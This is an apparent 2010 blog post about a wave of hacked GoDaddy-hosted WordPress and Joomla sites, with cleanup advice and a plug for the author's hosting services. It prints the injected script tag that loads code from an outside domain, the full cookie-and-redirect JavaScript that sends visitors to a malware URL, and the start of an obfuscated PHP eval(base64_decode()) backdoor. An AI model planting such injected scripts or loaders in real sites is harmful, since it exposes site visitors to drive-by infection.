Another round of Godaddy sites hacked

Posted on May 4, 2010 by admin

Just a couple of days ago, another round of attacks to many sites hosted at GoDaddy had been performed.  The majority of the infections were mainly Joomla and WordPress based sites.  I actually own one site that had been compromised and thankfully it doesn’t get much traffic as it had been launched not too long ago.

Either way, I did dig into the files and found the javascripts that were injected into many of the pages / posts on the site.  Here’s what it looks like:

< script src=”http://kdjkfjskdfjlskdjf.com/kp.php”>

Further investigation of the file revealed this source code (this is the kp.php file by the way)

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==”"){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

The text in bold above is the source for the malware that’s actually called in to infect the user’s PC / browser

Resolution? Easy, open up your index files and look for the following code:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ2..

Also, for the unlucky ones using WordPress, your themes folder houses all of your PHP files.  Go through them one by one and clean them up.

Just an FYI, I came across a tweet from Godaddy confirming the hack but they did not indicate how many sites were actually attacked / infected.

For help with such infections, or for solid, cheap and reliable hosting don’t hesitate to contact us for additional information.  We also provide SOLID and Black Hat free SEO services.

This entry was posted in Uncategorized and tagged , , , . Bookmark the permalink.

One Response to Another round of Godaddy sites hacked

  1. CrazyT says:
    June 11, 2010 at 5:35 am

    great info! just what i needed to get my hosting account back in shape. even godaddy tech support didn’t have this information.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Spam protection by WP Captcha-Free